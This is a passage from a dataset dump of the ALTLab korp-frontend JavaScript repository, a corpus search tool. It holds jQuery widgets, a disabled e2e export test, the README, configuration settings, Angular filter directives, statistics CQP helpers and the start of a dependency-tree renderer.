(attrSettings.linkAllValues || outerIdx === 0)\n// ) {\n// inner.data(\"key\", subValue)\n// inner.addClass(\"link\").click(function () {\n// const searchKey = attrSettings.searchKey || key\n// cqpVal = $(this).data(\"key\")\n// const cqpExpr = attrSettings.internalSearch\n// ? attrSettings.internalSearch(searchKey, cqpVal)\n// : `[${searchKey} contains '${regescape(cqpVal)}']`\n// return locationSearch({ search: \"cqp\", cqp: cqpExpr, page: null })\n// })\n// }\n// if (attrs.externalSearch) {\n// address = _.template(attrs.externalSearch)({ val: subValue })\n// externalLink = $(\n// `<a href='${address}' class='external_link' target='_blank' style='margin-top: -6px'></a>`\n// )\n// }\n\n// li.append(inner)\n// if (attrSettings.joinValues && idx !== subValues.length - 1) {\n// li.append(attrSettings.joinValues)\n// }\n// }\n// if (externalLink) {\n// li.append(externalLink)\n// }\n// lis.push(li)\n// }\n// } else {\n// lis = []\n// for (value of valueArray) {\n// li = $(\"<li></li>\")\n// li.append(value)\n// lis.push(li)\n// }\n// }\n\n// if (lis.length === 0) {\n// ul = $('<i rel=\"localize[empty]\" style=\"color : grey\"></i>')\n// } else {\n// ul = $(\"<ul style='list-style:initial'>\")\n// ul.append(lis)\n\n// if (lis.length !== 1 && !attrSettings.showAll) {\n// _.map(lis, function (li, idx) {\n// if (idx !== 0) {\n// return li.css(\"display\", \"none\")\n// }\n// })\n\n// const showAll = $(\n// `<span class='link' rel='localize[complemgram_show_all]'></span><span> (${\n// lis.length - 1\n// })</span>`\n// )\n// ul.append(showAll)\n\n// const showOne = $(\n// \"<span class='link' rel='localize[complemgram_show_one]'></span>\"\n// )\n// showOne.css(\"display\", \"none\")\n// ul.append(showOne)\n\n// showAll.click(function () {\n// showAll.css(\"display\", \"none\")\n// showOne.css(\"display\", \"inline\")\n// return _.map(lis, (li) => li.css(\"display\", \"list-item\"))\n// })\n\n// showOne.click(function () {\n// showAll.css(\"display\", \"inline\")\n// showOne.css(\"display\", \"none\")\n// _.map(lis, function (li, i) {\n// if (i !== 0) {\n// return li.css(\"display\", \"none\")\n// }\n// })\n// })\n// }\n// }\n\n// output.append(ul)\n// return output\n// } else if (attrs.type === \"set\") {\n// pattern = attrs.pattern || '<span data-key=\"<%= key %>\"><%= val %></span>'\n// ul = $(\"<ul>\")\n// const getStringVal = (str) =>\n// _.reduce(\n// _.invokeMap(_.invokeMap(str, \"charCodeAt\", 0), \"toString\"),\n// (a, b) => a + b\n// )\n// valueArray = _.filter((value && value.split(\"|\")) || [], Boolean)\n// if (key === \"variants\") {\n// // TODO: this doesn't sort quite as expected\n// valueArray.sort(function (a, b) {\n// const splita = util.splitLemgram(a)\n// const splitb = util.splitLemgram(b)\n// const strvala =\n// getStringVal(splita.form) + splita.index + getStringVal(splita.pos)\n// const strvalb =\n// getStringVal(splitb.form) + splitb.index + getStringVal(splitb.pos)\n\n// return parseInt(strvala) - parseInt(strvalb)\n// })\n// }\n\n// const itr = _.isArray(valueArray) ? valueArray : _.values(valueArray)\n// const lis = []\n// for (let x of itr) {\n// if (x.length) {\n// val = (attrs.stringify || _.identity)(x)\n\n// inner = $(_.template(pattern)({ key: x, val }))\n// if (attrs.translationKey != null) {\n// const prefix = attrs.translationKey || \"\"\n// inner.localeKey(prefix + val)\n// }\n\n// if (attrs.internalSearch) {\n// inner.addClass(\"link\").click(function () {\n// cqpVal = $(this).data(\"key\")\n// return locationSearch({\n// page: null,\n// search: \"cqp\",\n// cqp: `[${key} contains \\\"${regescape(cqpVal)}\\\"]`,\n// })\n// })\n// }\n\n// li = $(\"<li></li>\").data(\"key\", x).append(inner)\n// if (attrs.externalSearch) {\n// address = _.template(attrs.externalSearch)({ val: x })\n// li.append(\n// $(`<a href='${address}' class='external_link' target='_blank'></a>`)\n// )\n// }\n\n// lis.push(li)\n// }\n// }\n// ul.append(lis)\n// output.append(ul)\n\n// return output\n// }\n\n// const str_value = (attrs.stringify || _.identity)(value)\n\n// if (attrs.type === \"url\") {\n// return output.append(\n// `<a href='${str_value}' class='exturl sidebar_url' target='_blank'>${decodeURI(\n// str_value\n// )}</a>`\n// )\n// } else if (key === \"msd\") {\n// // msdTags = require '../markup/msdtags.html'\n// const msdTags = \"markup/msdtags.html\"\n// return output.append(`<span class='msd_sidebar'>${str_value}</span>\n// <a href='${msdTags}' target='_blank'>\n// <span class='sidebar_info ui-icon ui-icon-info'></span>\n// </a>\n// </span>\\\n// `)\n// } else if (attrs.pattern) {\n// return output.append(\n// _.template(attrs.pattern)({\n// key,\n// val: str_value,\n// pos_attrs: wordData,\n// struct_attrs: sentenceData,\n// })\n// )\n// } else {\n// if (attrs.translationKey) {\n// if (window.loc_data[\"en\"][attrs.translationKey + value]) {\n// return output.append(\n// `<span rel='localize[${attrs.translationKey}${value}]'></span>`\n// )\n// } else {\n// return output.append(`<span>${value}</span>`)\n// }\n// } else {\n// return output.append(`<span>${str_value || \"\"}</span>`)\n// }\n// }\n// },\n\n// applyEllipse() {\n// // oldDisplay = @element.css(\"display\")\n// // @element.css \"display\", \"block\"\n// const totalWidth = this.element.width()\n\n// // ellipse for too long links of type=url\n// this.element\n// .find(\".sidebar_url\")\n// .css(\"white-space\", \"nowrap\")\n// .each(function () {\n// while ($(this).width() > totalWidth) {\n// const oldtext = $(this).text()\n// const a = _.trim(oldtext, \"/\").replace(\"...\", \"\").split(\"/\")\n// const domain = a.slice(2, 3)\n// let midsection = a.slice(3).join(\"/\")\n// midsection = `...${midsection.slice(2)}`\n// $(this).text([\"http:/\"].concat(domain, midsection).join(\"/\"))\n// if (midsection === \"...\") {\n// break\n// }\n// }\n// })\n// },\n\n// updatePlacement() {\n// const max = Math.round($(\"#columns\").position().top)\n// if ($(window).scrollTop() < max) {\n// return this.element.removeClass(\"fixed\")\n// } else if ($(\"#left-column\").height() > $(\"#sidebar\").height()) {\n// return this.element.addClass(\"fixed\")\n// }\n// },\n// }\n\n// widget(\"korp.sidebar\", Sidebar)\n\nwidget(\"korp.radioList\", {\n options: {\n change: $.noop,\n separator: \"|\",\n selected: \"default\",\n },\n\n _create() {\n this._super()\n const self = this\n $.each(this.element, function () {\n // $.proxy(self.options.change, self.element)();\n return $(this)\n .children()\n .wrap(\"<li />\")\n .click(function () {\n if (!$(this).is(\".radioList_selected\")) {\n self.select($(this).data(\"mode\"))\n return self._trigger(\"change\", $(this).data(\"mode\"))\n }\n })\n .parent()\n .prepend($(\"<span>\").text(self.options.separator))\n .wrapAll(\"<ul class='inline_list' />\")\n })\n\n this.element.find(\".inline_list span:first\").remove()\n return this.select(this.options.selected)\n },\n\n select(mode) {\n this.options.selected = mode\n const target = this.element.find(\"a\").filter(function () {\n return $(this).data(\"mode\") === mode\n })\n this.element.find(\".radioList_selected\").removeClass(\"radioList_selected\")\n this.element.find(target).addClass(\"radioList_selected\")\n return this.element\n },\n\n getSelected() {\n return this.element.find(\".radioList_selected\")\n },\n})\n"
},
{
"alpha_fraction": 0.6223990321159363,
"alphanum_fraction": 0.6266829967498779,
"avg_line_length": 40.89743423461914,
"blob_id": "427a4c391551180951c2cdad44bdb9c1cfb36f17",
"content_id": "5362a48e09363a7cfbeb2dc8a67d1ba6183f02da",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1636,
"license_type": "permissive",
"max_line_length": 139,
"num_lines": 39,
"path": "/test/e2e/spec/statistics_export.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/* eslint-disable\n no-undef,\n*/\n\ndescribe(\"stats table export\", function() {\n\n const waitFor = function(elm) {\n browser.wait(() => elm.isPresent())\n browser.wait(() => elm.isDisplayed())\n }\n\n xit(\"should be possible to get relative frequencies as CSV\", () =>\n browser.get(browser.params.url + \"#?corpus=suc2,suc3&search=lemgram|gå..vb.1&result_tab=2\").then(function() {\n\n const kindOfData = element(by.css(\"#kindOfData option:checked\"))\n const kindOfFormat = element(by.css(\"#kindOfFormat option:checked\"))\n\n expect(kindOfData.getText()).toMatch(/Relativa.*/)\n expect(kindOfFormat.getText()).toMatch(/CSV.*/)\n \n element(by.css(\"#generateExportButton\")).click()\n element(by.css(\"#exportButton\")).click()\n })\n).pend(\"disabled because tests will succeed even though export fails\")\n\n xit(\"should be possible to get absolute frequencies as TSV with multiple reduce parameters\", () =>\n browser.get(browser.params.url + \"#?result_tab=2&stats_reduce=word,msd,saldo&corpus=suc2,suc3&search=word|gå ut\").then(function() {\n\n const kindOfData = element(by.css(\"#kindOfData option:checked\"))\n const kindOfFormat = element(by.css(\"#kindOfFormat option:checked\"))\n\n expect(kindOfData.getText()).toMatch(/Relativa.*/)\n expect(kindOfFormat.getText()).toMatch(/CSV.*/)\n \n element(by.css(\"#generateExportButton\")).click()\n element(by.css(\"#exportButton\")).click()\n })\n).pend(\"disabled because tests will succeed even though export fails\")\n})\n"
},
{
"alpha_fraction": 0.72963547706604,
"alphanum_fraction": 0.7315372228622437,
"avg_line_length": 44.72463607788086,
"blob_id": "462409397c2da52b76f4a83300b05609b7a4a032",
"content_id": "a09fb3a146c854d30abeb371913f7148e480130d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3157,
"license_type": "permissive",
"max_line_length": 285,
"num_lines": 69,
"path": "/README.md",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "# ALTLab Korp\n\nThis repo contains the [University of Alberta Language Technology Lab][ALTLab]'s (<abbr>ALTLab</abbr>) instance of [Korp][Korp], a tool for searching and visualizing natural language corpus data. Korp is developed by [Språkbanken][Spraakbanken] at the University of Gothenburg, Sweden.\n\n[View the frontend documentation for Korp here.][docs]\n\n## Getting started with developing Korp\n\n1. Install [yarn][yarn]\n - Korp must be developed with `yarn` rather than `npm`.\n\n1. Building Korp\n - install all dependencies: `yarn`\n - build a dev version: `yarn build`\n - build a dist version: set `NODE_ENV=production`, then `yarn build`\n\n1. Running Korp\n - run dev server: `yarn start:dev` or `yarn dev`\n - run dist server: `yarn start:dist` or `yarn start`\n\n1. Running tests\n - run tests: `yarn test` or `yarn test:karma` or `yarn test:e2e`\n - (tests currently depend on Språkbanken's setup; they will not pass locally)\n\n1. Deployment\n - `dev`: commits to `dev` are automatically deployed to `korp.altlab.dev` (see [deploy-dev.yml](https://github.com/UAlbertaALTLab/korp-frontend/blob/dev/.github/workflows/deploy-dev.yml))\n - `main`: commits to `main` are automatically deployed to `korp.altlab.app` (see [deploy-prod.yml](https://github.com/UAlbertaALTLab/korp-frontend/blob/dev/.github/workflows/deploy-prod.yml))\n\n## Configuration\n\nKorp uses `window.settings` to share needed configuration to `config.js` and `modes/common.js`.\n\n`config.js` and `modes/common.js` are included in webpack's dependency graph. Therefore it works to use `require` for anything needed, but only things that are in the configured location for settings.\n\n`mode`-files are only loaded at runtime an any dependencies must be required in `modes/common.js` and then exported as a module as shown in the sample file `app/modes/common.js`.\n\n## webpack\n\nKorp uses *webpack* to build Korp and *webpack-dev-server* to run a local server. To include new code or resources, require them where needed:\n\n```\nnd = require(`new-dependency`)\nnd.aFunction()\n```\n\nor\n\n```\nimgPath = require(`img/image.png`)\nmyTemplate = `<img src='${imgPath}'>`\n```\n\nMost dependencies are only specified in `app/index.js` and where needed added to the `window` object.\n\nAbout the current loaders in in `webpack.config.js`:\n\n- `pug` and `html` files: all `src`-attributes in `<img>` tags and all `href`s in `<link>` tags will be loaded by webpack and replaced in the markup. Uses file loader so that requiring a `pug` or `html` file will give the path to the file back.\n- `js` files are added to the bundle.\n- All images and fonts are added to the bundle using file loader and gives back a file path.\n- `css` and `scss` are added to the bundle. `url`s will be loaded and replaced by webpack.\n\nIn addition to this, some specific files will simply be copied as is, for example Korp mode-files.\n\n<!-- Links -->\n[ALTLab]: https://altlab.artsrn.ualberta.ca/\n[docs]: https://github.com/spraakbanken/korp-frontend/blob/master/doc/frontend_devel.md\n[Korp]: https://github.com/spraakbanken/korp-frontend\n[Spraakbanken]: https://spraakbanken.gu.se\n[yarn]: https://yarnpkg.com\n"
},
{
"alpha_fraction": 0.5753180384635925,
"alphanum_fraction": 0.5938931107521057,
"avg_line_length": 23.5625,
"blob_id": "3b483eb3b4dfc0cdf72711d5d7dca6895688fb7a",
"content_id": "ffb56b1c91af51b9ccb6c73e8390837c36bd7e89",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3930,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 160,
"path": "/app/config.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "const isLab = window.isLab || false;\n\nsettings.autocomplete = true;\nsettings.newMapEnabled = isLab;\nsettings.hitsPerPageDefault = 25;\nsettings.hitsPerPageValues = [25,50,75,100,500,1000];\nsettings.enableBackendKwicDownload = false;\nsettings.enableFrontendKwicDownload = true;\n\nsettings.languages = [`en`];\nsettings.defaultLanguage = `en`;\n\nsettings.downloadFormats = [\n `csv`,\n `tsv`,\n `annot`,\n `ref`,\n];\n\nsettings.downloadFormatParams = {\n \"*\": {\n structs: `+`,\n },\n ref: {\n format: `bibref,xls`,\n },\n csvp: {\n format: `tokens,csv`,\n attrs: `+,-lex`,\n match_marker: `***`,\n },\n csv: {\n format: `sentences,csv`,\n },\n annot: {\n format: `tokens,xls`,\n attrs: `+,-lex`,\n match_marker: `***`,\n },\n nooj: {\n attrs: `+`,\n },\n tsv: {\n format: `sentences,tsv`,\n },\n vrt: {\n attrs: `+`,\n },\n};\n\n// for extended search dropdown, can be 'union' or 'intersection'\nsettings.wordAttributeSelector = `union`;\nsettings.structAttributeSelector = `union`;\n\n// for 'compile statistics by' selector, can be 'union' or 'intersection'\nsettings.reduceWordAttributeSelector = `intersection`;\nsettings.reduceStructAttributeSelector = `intersection`;\n\nsettings.filterSelection = `intersection`;\n\nsettings.newsDeskUrl = `https://svn.spraakdata.gu.se/sb-arkiv/pub/component_news/json/korpnews.json`;\n\nsettings.wordpictureTagset = {\n // supported pos-tags\n verb: `vb`,\n\n noun: `nn`,\n adjective: `jj`,\n adverb: `ab`,\n preposition: `pp`,\n\n // dependency releations\n subject: `ss`,\n object: `obj`,\n adverbial: `adv`,\n preposition_rel: `pa`,\n pre_modifier: `at`,\n post_modifier: `et`,\n adverbial2: `aa`,\n};\n\n\nsettings.wordPictureConf = {\n verb: [[\n { rel: `subject`, css_class: `color_blue` },\n `_`,\n { rel: `object`, css_class: `color_purple` },\n { rel: `adverbial`, css_class: `color_green` },\n ]],\n noun: [\n [{ rel: `preposition_rel`, css_class: `color_yellow`, field_reverse: true },\n { rel: `pre_modifier`, css_class: `color_azure` },\n `_`,\n { rel: `post_modifier`, css_class: `color_red` }],\n\n [`_`, { rel: `subject`, css_class: `color_blue`, field_reverse: true, alt_label: `vb` }],\n [{ rel: `object`, css_class: `color_purple`, field_reverse: true, alt_label: `vb` }, `_`],\n ],\n adjective: [\n [`_`, { rel: `pre_modifier`, css_class: `color_yellow`, field_reverse: true }],\n [{ rel: `adverbial2`, css_class: `color_purple` }, `_`],\n ],\n adverb: [\n [`_`, { rel: `adverbial`, css_class: `color_yellow`, field_reverse: true }],\n [`_`, { rel: `adverbial2`, css_class: `color_purple`, field_reverse: true }],\n ],\n preposition: [[`_`, { rel: `preposition_rel`, css_class: `color_green` }]],\n\n};\n\nsettings.visibleModes = 6;\nsettings.modeConfig = [\n {\n localekey: `modern_texts`,\n mode: `default`,\n },\n {\n localekey: `parallel_texts`,\n mode: `parallel`,\n },\n];\n\nsettings.primaryColor = `rgb(221, 233, 255)`;\nsettings.primaryLight = `rgb(242, 247, 255)`;\n\nsettings.defaultOverviewContext = `1 sentence`;\nsettings.defaultReadingContext = `1 paragraph`;\n\nsettings.defaultWithin = {\n sentence: `sentence`,\n};\n\nsettings.spContext = {\n \"1 sentence\": `1 sentence`,\n \"1 paragraph\": `1 paragraph`,\n};\n\n// for optimization purposes\nsettings.cqpPrio = [`deprel`, `pos`, `msd`, `suffix`, `prefix`, `grundform`, `lemgram`, `saldo`, `word`];\n\nsettings.defaultOptions = {\n is: `=`,\n is_not: `!=`,\n starts_with: `^=`,\n contains: `_=`,\n ends_with: `&=`,\n matches: `*=`,\n matches_not: `!*=`,\n};\n\nsettings.korpBackendURL = `https://korp-backend.altlab.dev`;\nsettings.downloadCgiScript = `https://ws.spraakbanken.gu.se/ws/korp/download`;\n\nsettings.mapCenter = {\n lat: 62.99515845212052,\n lng: 16.69921875,\n zoom: 4,\n};\n\nsettings.readingModeField = `sentence_id`;\n"
},
{
"alpha_fraction": 0.5480754375457764,
"alphanum_fraction": 0.5524388551712036,
"avg_line_length": 38.61111068725586,
"blob_id": "cdd67a65f1e4b879c5112112b0eac3bdebd9887d",
"content_id": "6048ae540b1e60247a320d75f160e19ba0ec2a91",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6424,
"license_type": "permissive",
"max_line_length": 142,
"num_lines": 162,
"path": "/app/scripts/filter_directives.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nconst plusImg = require(\"../img/plus.png\")\n\nkorpApp.filter(\"replaceEmpty\", function () {\n return function (input) {\n if (input === \"\") {\n return \"–\"\n } else {\n return input\n }\n }\n})\n\nkorpApp.directive(\"globalFilters\", (globalFilterService) => ({\n restrict: \"E\",\n scope: {\n lang: \"=\",\n },\n template: `\\\n<div ng-if=\"dataObj.showDirective\" class=\"global-filters-container\">\n <span style=\"font-weight: bold;\"> {{ 'global_filter' | loc:lang}}:</span>\n <div style=\"display: inline-block\">\n <span ng-repeat=\"filterKey in dataObj.selectedFilters\">\n <global-filter lang=\"lang\" attr=\"filterKey\"\n attr-value=\"dataObj.filterValues[filterKey].value\",\n attr-label=\"getFilterLabel(filterKey)\",\n possible-values=\"dataObj.filterValues[filterKey].possibleValues\"\n translation-key=\"getTranslationKey(filterKey)\"\n closeable=\"isOptionalFilter(filterKey)\"/>\n <span ng-if=\"getAvailableFilters().length !== 0 || !$last\">{{\"and\" | loc:lang}}</span>\n </span>\n\n <span uib-dropdown auto-close=\"outsideClick\" ng-if=\"getAvailableFilters().length !== 0\">\n <span uib-dropdown-toggle style=\"vertical-align: sub;\">\n <img src=\"#{plusImg}\">\n </span>\n <div uib-dropdown-menu class=\"korp-uib-dropdown-menu\">\n <ul>\n <li ng-repeat=\"value in getAvailableFilters()\" ng-click=\"addNewFilter(value)\" class=\"attribute\">\n <span>{{getFilterLabel(value) | loc:lang }}</span>\n </li>\n </ul>\n </div>\n </span>\n <span style=\"margin-left: 5px; vertical-align: top;\" ng-if=\"dataObj.selectedFilters.length == 0\">Välj ett filter</span>\n\n </div>\n <div ng-if=\"false\">\n <img src=\"#{plusImg}\">\n <span style=\"font-weight: bold\" > {{'add_filter' | loc:lang}}</span>\n </div>\n</div>`,\n link(scope, element, attribute) {\n globalFilterService.registerScope(scope)\n\n scope.dataObj = { showDirective: false }\n\n scope.update = (dataObj) => (scope.dataObj = dataObj)\n\n scope.getFilterLabel = (filterKey) => scope.dataObj.attributes[filterKey].settings.label\n\n scope.getTranslationKey = (filterKey) =>\n scope.dataObj.attributes[filterKey].settings.translationKey || \"\"\n\n scope.removeFilter = (filter) => globalFilterService.removeFilter(filter)\n\n scope.getAvailableFilters = () =>\n _.filter(\n scope.dataObj.optionalFilters,\n (filter) => !scope.dataObj.selectedFilters.includes(filter)\n )\n\n scope.isOptionalFilter = (filterKey) =>\n scope.dataObj.optionalFilters.indexOf(filterKey) > -1 &&\n scope.dataObj.defaultFilters.indexOf(filterKey) === -1\n\n scope.addNewFilter = (value) => globalFilterService.addNewFilter(value, true)\n },\n}))\n\nkorpApp.directive(\"globalFilter\", (globalFilterService) => ({\n restrict: \"E\",\n scope: {\n attr: \"=\",\n attrLabel: \"=\",\n attrValue: \"=\",\n possibleValues: \"=\",\n lang: \"=\",\n translationKey: \"=\",\n closeable: \"=\",\n },\n template: `\\\n<span uib-dropdown auto-close=\"outsideClick\" on-toggle=\"dropdownToggle(open)\">\n <button uib-dropdown-toggle class=\"btn btn-sm btn-default global-filter-toggle\">\n <span ng-if=\"attrValue.length == 0\">\n <span>{{ \"add_filter_value\" | loc:lang }}</span>\n <span>{{attrLabel | loc:lang}}</span>\n </span>\n <span ng-if=\"attrValue.length != 0\">\n <span style=\"text-transform: capitalize\">{{attrLabel | loc:lang}}:</span>\n <span ng-repeat=\"selected in attrValue\" class=\"selected-attr-value\">{{translationKey + selected | loc:lang | replaceEmpty }} </span>\n </span>\n <i ng-if=\"closeable\" class=\"close_btn fa fa-times-circle-o fa-1\" ng-click=\"removeFilter($event)\" />\n </button>\n <div uib-dropdown-menu class=\"korp-uib-dropdown-menu\">\n <ul>\n <li ng-repeat=\"value in possibleValues\" ng-class=\"selected\" class=\"attribute\"\n ng-click=\"toggleSelected(value[0], $event)\"\n ng-if=\"isSelectedList(value[0])\">\n <span ng-if=\"isSelected(value[0])\">✔</span>\n <span>{{translationKey + value[0] | loc:lang | replaceEmpty }}</span>\n <span style=\"font-size: x-small;\">{{value[1]}}</span>\n </li>\n <li ng-repeat=\"value in possibleValues\" class=\"attribute\"\n ng-click=\"toggleSelected(value[0], $event)\"\n ng-if=\"!isSelectedList(value[0]) && value[1] > 0\">\n <span ng-if=\"isSelected(value[0])\">✔</span>\n <span>{{translationKey + value[0] | loc:lang | replaceEmpty }}</span>\n <span style=\"font-size: x-small;\">{{value[1]}}</span>\n </li>\n <li ng-repeat=\"value in possibleValues\" class=\"attribute disabled\"\n ng-if=\"!isSelectedList(value[0]) && value[1] == 0\"\n >\n <span>{{translationKey + value[0] | loc:lang | replaceEmpty }}</span>\n <span style=\"font-size: x-small;\">{{value[1]}}</span>\n </li>\n </ul>\n </div>\n</span>`,\n\n link(scope, element, attribute) {\n // if scope.possibleValues.length > 20\n // # TODO enable autocomplete\n\n scope.selected = _.clone(scope.attrValue)\n scope.dropdownToggle = function (open) {\n if (!open) {\n scope.selected = []\n return scope.attrValue.map((value) => scope.selected.push(value))\n }\n }\n\n scope.toggleSelected = function (value, event) {\n if (scope.isSelected(value)) {\n _.pull(scope.attrValue, value)\n } else {\n scope.attrValue.push(value)\n }\n event.stopPropagation()\n globalFilterService.valueChange(scope.attr)\n }\n\n scope.isSelected = (value) => scope.attrValue.includes(value)\n\n scope.isSelectedList = (value) => scope.selected.includes(value)\n\n scope.removeFilter = function (event) {\n event.stopPropagation()\n scope.$parent.removeFilter(scope.attr)\n }\n },\n}))\n"
},
{
"alpha_fraction": 0.4496520757675171,
"alphanum_fraction": 0.45292672514915466,
"avg_line_length": 32.69655227661133,
"blob_id": "5d5e670db2f39271a1f3fc937f426cf9ca606897",
"content_id": "2512a3855b3084a019f3f2bc3a4dd64592bd8ffd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4890,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 145,
"path": "/app/config/statistics_config.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nlet getCqp = function(hitValues, ignoreCase) {\n var tokens = []\n for (var i = 0; i < hitValues.length; i++) {\n var token = hitValues[i]\n var andExpr = []\n for (var attribute in token) {\n if (token.hasOwnProperty(attribute)) {\n var values = token[attribute]\n andExpr.push(reduceCqp(attribute, values, ignoreCase))\n }\n }\n tokens.push(\"[\" + andExpr.join(\" & \") + \"]\")\n }\n return \"(\" + tokens.join(\" \") + \")\"\n}\n\nlet reduceCqp = function(type, tokens, ignoreCase) {\n let attrs = settings.corpusListing.getCurrentAttributes()\n if (attrs[type] && attrs[type].stats_cqp) {\n return attrs[type].stats_cqp(tokens, ignoreCase)\n }\n switch (type) {\n case \"saldo\":\n case \"prefix\":\n case \"suffix\":\n case \"lex\":\n case \"lemma\":\n case \"sense\":\n if (tokens[0] === \"\") return \"ambiguity(\" + type + \") = 0\"\n else var res\n if (tokens.length > 1) {\n var key = tokens[0].split(\":\")[0]\n\n var variants = []\n _.map(tokens, function(val) {\n parts = val.split(\":\")\n if (variants.length == 0) {\n for (var idx = 0; idx < parts.length - 1; idx++) variants.push([])\n }\n for (var idx = 1; idx < parts.length; idx++) variants[idx - 1].push(parts[idx])\n })\n\n variants = _.map(variants, function(variant) {\n return \":(\" + variant.join(\"|\") + \")\"\n })\n\n res = key + variants.join(\"\")\n } else {\n res = tokens[0]\n }\n return type + \" contains '\" + res + \"'\"\n case \"word\":\n let s = 'word=\"' + regescape(tokens[0]) + '\"'\n if (ignoreCase) s = s + \" %c\"\n return s\n case \"pos\":\n case \"deprel\":\n case \"msd\":\n return $.format('%s=\"%s\"', [type, tokens[0]])\n case \"text_blingbring\":\n case \"text_swefn\":\n return $.format('_.%s contains \"%s\"', [type, tokens[0]])\n default:\n // assume structural attribute\n return $.format('_.%s=\"%s\"', [type, tokens[0]])\n }\n}\n\n// Get the html (no linking) representation of the result for the statistics table\nlet reduceStringify = function(type, values, structAttributes) {\n let attrs = settings.corpusListing.getCurrentAttributes()\n if (attrs[type] && attrs[type].stats_stringify) {\n return attrs[type].stats_stringify(values)\n }\n\n switch (type) {\n case \"word\":\n case \"msd\":\n return values.join(\" \")\n case \"pos\":\n var output = _.map(values, function(token) {\n return $(\"<span>\")\n .localeKey(\"pos_\" + token)\n .outerHTML()\n }).join(\" \")\n return output\n case \"saldo\":\n case \"prefix\":\n case \"suffix\":\n case \"lex\":\n case \"lemma\":\n case \"sense\":\n if (type == \"saldo\" || type == \"sense\") {\n var stringify = util.saldoToString\n } else if (type == \"lemma\") {\n stringify = lemma => lemma.replace(/_/g, \" \")\n } else {\n stringify = util.lemgramToString\n }\n\n var html = _.map(values, function(token) {\n if (token === \"\") return \"–\"\n return stringify(token.replace(/:.*/g, \"\"), true)\n })\n\n return html.join(\" \")\n\n case \"deprel\":\n var output = _.map(values, function(token) {\n return $(\"<span>\")\n .localeKey(\"deprel_\" + token)\n .outerHTML()\n }).join(\" \")\n return output\n case \"msd_orig\": // TODO: OMG this is corpus specific, move out to config ASAP (ASU corpus)\n var output = _.map(values, function(token) {\n return $(\"<span>\")\n .text(token)\n .outerHTML()\n }).join(\" \")\n return output\n default:\n // structural attributes\n var prefix = \"\"\n if (structAttributes.translationKey) prefix = structAttributes.translationKey\n var mapped = _.map(values, function(value) {\n if (structAttributes[\"set\"] && value === \"\") {\n return \"–\"\n } else if (value === \"\") {\n return \"-\"\n } else if (loc_data[\"en\"][prefix + value]) {\n return util.getLocaleString(prefix + value)\n } else {\n return value\n }\n })\n return mapped.join(\" \")\n }\n}\n\nexport default {\n getCqp,\n reduceStringify\n}\n"
},
{
"alpha_fraction": 0.5318902134895325,
"alphanum_fraction": 0.5440664887428284,
"avg_line_length": 25.664947509765625,
"blob_id": "ac41bb491a6ba0898e9de5d217e514c22ff29a6f",
"content_id": "0cad505cef2985a251c38537324f2b9dc659ff28",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5174,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 194,
"path": "/app/lib/deptrees/deptrees.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/* eslint-disable\n no-return-assign,\n no-undef,\n standard/array-bracket-even-spacing,\n*/\n// TODO: This file was created by bulk-decaffeinate.\n// Fix any style issues and re-enable lint.\n/*\n * decaffeinate suggestions:\n * DS101: Remove unnecessary use of Array.from\n * DS102: Remove unnecessary code created because of implicit returns\n * DS205: Consider reworking code to avoid use of IIFEs\n * DS207: Consider shorter variations of null checks\n * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md\n */\n\n// Draw the sentence in sent\n//\n// If hover_fun is given, then it will be invoked with arguments of the form\n// { deprel: 'AA' } and { pos: 'PN' }\nwindow.draw_deptree = function(sent, hover_fun) {\n\n // console.log \"Drawing\", sent, window\n\n if (hover_fun == null) { hover_fun = function() {} }\n const sent_id = \"magic_secret_id\"\n\n const deprel_div = $(\"<div>\").attr(\"id\", sent_id)\n\n $('body').empty().append(deprel_div)\n\n return draw_brat_tree(sent, sent_id, hover_fun)\n}\n\n\nwindow.sentence_xml_to_json = sent =>\n _.map($(sent).children(), function(word) {\n const obj = { word: word.textContent }\n _.map([\"pos\", \"ref\", \"dephead\", \"deprel\"], attr => obj[attr] = $(word).attr(attr))\n return obj\n })\n\n\n// Initialise brat\n$(document).ready(head.js)\n\nconst webFontURLs = [\n \"lib/brat/static/fonts/Astloch-Bold.ttf\",\n \"lib/brat/static/fonts/PT_Sans-Caption-Web-Regular.ttf\",\n \"lib/brat/static/fonts/Liberation_Sans-Regular.ttf\"\n]\n\n// words are from one sentence and are Strings with extra attributes\n// including rel, dephead and deprel and pos\nconst color_from_chars = function(w, sat_min, sat_max, lightness) {\n let v = 1.0\n let hue = 0.0\n let sat = 0.0\n const len = w.length\n let i = 0\n\n while (i < len) {\n v = v / 26.0\n sat += ((w.charCodeAt(i)) % 26) * v\n hue += ((w.charCodeAt(i)) % 26) * (1.0 / 26 / len)\n i++\n }\n hue = hue * 360\n sat = (sat * (sat_max - sat_min)) + sat_min\n const color = $.Color({\n hue,\n saturation: sat,\n lightness\n })\n return color.toHexString(0)\n}\n\n// Makes a brat entity from a positional attribute\nconst make_entity_from_pos = p =>\n ({\n type: p,\n labels: [p],\n bgColor: color_from_chars(p, 0.8, 0.95, 0.95),\n borderColor: \"darken\"\n })\n\n\n// Makes a brat relation from a dependency relation\nconst make_relation_from_rel = r =>\n ({\n type: r,\n labels: [r],\n color: 